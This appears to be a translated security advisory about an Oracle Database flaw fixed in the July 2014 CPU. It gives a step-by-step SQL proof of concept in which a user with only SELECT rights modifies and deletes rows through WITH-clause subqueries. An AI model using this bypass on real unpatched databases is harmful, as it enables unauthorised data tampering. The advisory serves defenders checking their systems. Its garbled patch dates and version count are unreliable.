Oracle Database high-risk vulnerability warning!

Oracle Database high-risk vulnerability warning!

Users have recently exposed an Oracle high-risk vulnerability on the Internet. Users with only query permissions can add, delete, and modify data, which is very dangerous. This vulnerability has a wide range of impact, including the most common versions in China, such as 11.2.0.3, 11.2.0.4, and 12.1.

This vulnerability was fixed in the CPU of July 15, July 2014. However, if the CPU is not applied, the vulnerability still exists. We strongly recommend that you check all Oracle databases to check whether this security risk exists.

Yun and emo reproduce the vulnerability in their testing environments. Yun and emo test environments include five versions: 11.2.0.3, 11.2.0.4, and 12.1.0.1. You can also perform the following steps to check whether the database has this vulnerability.

(Note: The following steps are for reference only. In principle, they will not affect the database, but are not responsible for the risks that may occur when the following SQL statements are executed in the production environment)

1. Create a basic test user and grant only the session creation permission.

SQL> create user test_update identified by test_update;

User created.

SQL> grant create session to test_update;

Grant succeeded.

2. Grant the Table query permission to the user. Note that many product environments have similar settings.

SQL> grant select on t to test_update;

Grant succeeded.

SQL> select count (*) from t;

COUNT (*)

----------

100

3. Use the test user connection to verify that normal permissions for addition, deletion, and modification are denied.

SQL> conn test_update/test_update

Connected.

SQL> select * from enmo. t where rownum = 1;

ID

----------

1

SQL> update enmo. t set id = 1 where id = 1;

Update enmo. t set id = 1 where id = 1

*

ERROR at line 1:

ORA-01031: insufficient privileges

4. In the WITH statement, the permission restriction is completely bypassed, and the permission for adding, deleting, modifying, and modifying is obtained.

SQL> update (with tmp as (select id from enmo. t) select id from tmp) set id = 0 where id = 1;

1 row updated.

SQL> commit;

Commit complete.

SQL> delete (with temp as (select * from enmo. t) select id from temp) where id = 2;

1 row deleted.

SQL> insert into (with temp as (select * from enmo. t) select * from temp) select 2 from enmo. t where id = 3;

1 row created.

5. In the Oracle CPU, this problem was modified in the CPU in December July 2014.

Because many users do not know the CPU content and do not apply it, it has a high-risk impact. The following shows the permission response after the CPU is applied.

SQL> update (with tmp as (select id from enmo. t) select id from tmp) set id = 1 where id = 1;

Update (with tmp as (select id from enmo. t) select id from tmp) set id = 1 where id = 1

*

ERROR at line 1:

ORA-01031: insufficient privileges

Warning many users are not paying enough attention to the CPU security patch, so this high risk may exist in the system. We recommend that you pay attention to this vulnerability and take appropriate measures in a timely manner. The CVE numbers associated with this include: CVE-2013-3751, CVE-2014-4236, CVE-2014-4237, CVE-2014-4245, CVE-2013-3774.

For more information, see the Oracle CPU page:

Http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html